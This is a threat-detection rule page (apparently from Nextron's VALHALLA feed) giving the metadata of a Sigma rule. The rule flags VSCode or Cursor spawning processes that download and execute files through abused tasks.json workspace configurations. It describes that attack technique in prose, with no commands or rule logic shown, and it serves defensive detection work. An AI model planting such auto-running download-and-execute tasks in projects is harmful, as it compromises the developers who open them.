Suspicious Download and Execution Pattern via VSCode/Cursor Tasks - Linux

Rule Info

Name
Suspicious Download and Execution Pattern via VSCode/Cursor Tasks - Linux
Author
Swachchhanda Shrawan Poudel (Nextron Systems)
Description
Detects suspicious patterns where Visual Studio Code or Cursor spawns processes that both download and execute files, which may indicate abuse of the `tasks.json` configuration for malicious purposes. This technique has been observed in campaigns such as "Contagious Interview," where adversaries leverage VSCode's workspace trust model to execute arbitrary code by embedding malicious commands in `tasks.json`. Attackers may craft or alter `tasks.json` to automatically trigger downloads and execution of payloads when a user opens and trusts a workspace in VSCode or Cursor, enabling initial access or further compromise.
Reference
https://securitylabs.datadoghq.com/articles/ide-shepherd-release-article/
Date
2026-04-02 00:00:00
Modified
None
Id
642774a1-60d4-4fc0-adde-5902a2a6225d
Tags
attack.execution attack.t1059.004 attack.defense-evasion attack.t1218
Type
Nextron Sigma feed only (private)

Rule History

THOR Logo  Scan your endpoints, forensic images or collected files with our portable scanner THOR
  Warning: Access to VALHALLA is rate-limited - once you prove unworthy, access gets denied
  Nextron Systems 2022